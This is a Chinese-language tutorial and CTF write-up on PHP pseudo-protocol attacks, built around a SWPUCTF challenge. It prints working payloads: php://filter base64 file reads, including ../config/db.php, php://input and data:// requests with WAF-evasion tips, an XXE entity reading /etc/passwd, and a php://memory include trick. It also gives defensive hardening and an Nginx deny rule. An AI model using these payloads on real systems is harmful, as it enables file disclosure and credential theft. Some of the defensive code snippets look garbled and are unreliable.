1. PHP伪协议入门从概念到实战场景第一次接触PHP伪协议是在一次内部安全测试中当时需要绕过文件读取限制获取配置文件。传统方法都失效后同事轻描淡写地说了句试试php://filter结果让我打开了新世界的大门。PHP伪协议Pseudo-Protocols就像PHP内置的特殊通道允许开发者用类似URL的语法访问各种I/O流。常见的包括php://filter最常用的数据过滤器可以进行base64编码/解码、字符串旋转等操作php://input直接读取原始POST数据常用于绕过输入限制data://将数据直接嵌入URI中适合传输小型数据块在CTF比赛中这些协议经常成为解题的关键。比如去年SWPUCTF新生赛那道题就是典型的使用场景。题目初始页面只有一个简单提示和URL参数但通过php://filter就能读取到隐藏的hint.php文件。这种看不见的攻击路径正是Web安全攻防中最有趣的部分。2. 深入解析SWPUCTF赛题实战2.1 第一阶段信息收集与突破那道SWPUCTF题目开始时毫无头绪页面只显示你能找到hint.php吗。关键线索是URL中的wllm参数这提示可能需要参数注入。尝试直接访问hint.php返回403但使用wllmphp://filter/read/convert.base64-encode/resourcehint.php这个payload的精妙之处在于通过filter协议绕过文件直接读取限制使用base64编码避免特殊字符被解析resource参数指定目标文件解码后得到关键信息?php //go to /test2222222222222.php ?。这个阶段教会我们永远要检查所有可能的输入点包括看似无害的URL参数。2.2 第二阶段代码审计与逻辑分析进入/test2222222222222.php后源码暴露了关键逻辑?php ini_set(max_execution_time, 180); show_source(__FILE__); include(flag.php); $a $_GET[a]; if(isset($a)(file_get_contents($a,r)) I want flag){ echo success\n; echo $flag; } ?这段代码有3个致命漏洞直接使用未过滤的GET参数file_get_contents()支持伪协议字符串比对没有类型安全检查2.3 第三阶段两种攻击路径实战2.3.1 php://input方案需要服务器配置allow_url_includeOn虽然题目环境已开启POST /test2222222222222.php?aphp://input HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded I want flag这种方法的本质是把POST体作为文件内容读取。我在实际测试中发现如果遇到WAF拦截可以尝试以下变体修改Content-Type为text/plain在数据前后添加空白字符使用分块传输编码2.3.2 data://方案更简单的GET型攻击适合受限环境GET /test2222222222222.php?adata://text/plain,I want flag HTTP/1.1 Host: example.comdata://的格式要注意必须包含MIME类型text/plain逗号后直接跟数据内容特殊字符需要URL编码3. PHP伪协议的底层原理3.1 流包装器工作机制PHP伪协议本质是流包装器(Stream Wrapper)它们通过注册协议处理器来实现特殊IO操作。当遇到php://开头的URI时PHP内核解析协议类型查找注册的包装器实现调用对应的open()/read()/write()方法返回处理后的流资源用个生活比喻就像快递柜的取件码你不需要知道包裹具体在哪只要输入正确协议取件码系统就会自动处理后续流程。3.2 各协议的安全边界php://filter可进行多层过滤器堆叠支持字符串处理rot13、大小写转换等内存消耗较大可能用于DoS攻击php://input只能读取一次原始POST数据不受php.ini中post_max_size限制常用于绕过WAF检测data://数据长度受限于URI最大长度通常8KB可嵌入二进制数据base64编码不需要服务器存储临时文件4. 防御策略与实战建议4.1 开发层面的防护在项目中发现过这样一个案例某CMS因为直接使用file_get_contents($_GET[url])导致被攻破。正确的做法应该是// 白名单校验协议 $allowed_schemes [http, https]; $parsed parse_url($input); if(!in_array($parsed[scheme] ?? , $allowed_schemes)){ throw new InvalidArgumentException(非法协议); } // 使用fopen的严格模式 $context stream_context_create([ php [allow_url_fopen false], file [allow_url_fopen true] ]);4.2 服务器配置加固在php.ini中建议设置; 禁用危险协议 allow_url_fopen Off allow_url_include Off ; 限制可用的包装器 user_agentPHP disable_classes disable_functions4.3 监控与日志分析建议监控以下异常行为频繁出现的php://filter请求异常的base64编码参数超长的data://URI在Nginx中可添加如下规则location ~* \.php$ { if ($query_string ~* php://|data://) { return 403; } }5. 拓展攻击场景与高级技巧5.1 文件包含组合技曾在一个真实渗透测试中结合使用伪协议和文件包含漏洞?pagephp://filter/readconvert.base64-encode/resource../config/db.php这种手法可以绕过常规的.php后缀限制避免包含时代码被执行突破目录遍历限制5.2 XXE与伪协议的联动当遇到XML解析时可以尝试!DOCTYPE xxe [ !ENTITY % dtd SYSTEM php://filter/readconvert.base64-encode/resource/etc/passwd %dtd; ]5.3 内存操作进阶通过php://memory和php://temp可以操作内存流$fp fopen(php://memory, r); fwrite($fp, 恶意代码); include(php://memory); // 在某些环境下可执行这种手法的防御需要禁用allow_url_include并启用open_basedir限制。